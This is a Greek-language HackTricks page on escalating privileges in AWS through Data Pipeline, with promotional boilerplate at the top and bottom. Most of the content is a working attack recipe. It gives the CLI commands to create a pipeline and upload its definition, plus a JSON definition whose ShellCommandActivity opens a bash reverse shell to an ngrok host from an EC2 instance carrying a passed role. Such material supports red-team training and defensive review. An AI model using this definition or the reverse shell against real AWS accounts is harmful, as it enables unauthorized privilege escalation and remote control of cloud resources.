AWS - Datapipeline Privesc

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Αν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
Αποκτήστε το επίσημο PEASS & HackTricks swag
Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.

datapipeline

Για περισσότερες πληροφορίες σχετικά με το datapipeline, ελέγξτε:

AWS - DataPipeline, CodePipeline & CodeCommit Enum

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`

Οι χρήστες με αυτές τις άδειες μπορούν να ανεβάσουν προνόμια δημιουργώντας ένα Data Pipeline για να εκτελέσουν αυθαίρετες εντολές χρησιμοποιώντας τα προνόμια του ανατεθειμένου ρόλου:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

Μετά τη δημιουργία του pipeline, ο επιτιθέμενος ενημερώνει τον ορισμό του για να καθορίσει συγκεκριμένες ενέργειες ή δημιουργίες πόρων:

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

Σημείωση ότι ο ρόλος στη γραμμή 14, 15 και 27 πρέπει να είναι ένας ρόλος που μπορεί να υποθέσει ο datapipeline.amazonaws.com και ο ρόλος στη γραμμή 28 πρέπει να είναι ένας ρόλος που μπορεί να υποθέσει ο ec2.amazonaws.com με ένα προφίλ EC2 instance.

Επιπλέον, η EC2 instance θα έχει πρόσβαση μόνο στον ρόλο που μπορεί να υποθέσει η EC2 instance (έτσι μπορείτε να κλέψετε μόνο αυτόν).

```bash aws datapipeline put-pipeline-definition --pipeline-id \ --pipeline-definition file:///pipeline/definition.json ``` Το **αρχείο ορισμού του pipeline, που δημιουργήθηκε από τον επιτιθέμενο, περιλαμβάνει οδηγίες για την εκτέλεση εντολών** ή τη δημιουργία πόρων μέσω του AWS API, εκμεταλλευόμενος τα δικαιώματα ρόλου του Data Pipeline για να αποκτήσει πιθανώς επιπλέον προνόμια.

Πιθανές Επιπτώσεις: Άμεση αύξηση προνομίων στον καθορισμένο ρόλο της υπηρεσίας ec2.

Αναφορές

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ!
Αποκτήστε το επίσημο PEASS & HackTricks swag
Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.

PreviousAWS - Cognito Privesc NextAWS - Directory Services Privesc

Last updated 9 months ago

datapipeline

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Αναφορές

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`